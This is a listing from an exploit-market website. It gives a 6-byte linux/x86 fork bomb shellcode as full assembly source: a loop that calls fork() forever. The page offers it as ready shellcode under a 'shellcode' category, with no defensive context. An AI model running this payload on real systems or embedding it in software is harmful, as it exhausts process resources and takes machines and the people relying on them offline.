[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

linux/x86 fork bomb 6 bytes

Author
thegibson
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9840
Category
shellcode
Date add
30-12-2009
Platform
linux/x86
===========================
linux/x86 fork bomb 6 bytes 
===========================

Smallest fork bomb shellcode I could make.
 
 
; linux/x86 fork bomb 6 bytes
; root@thegibson
; 2009-12-30
 
section .text
    global _start
 
_start:
    ; fork()
    mov al, 2
    int 0x80
    jmp short _start



#  0day.today [2024-11-16]  #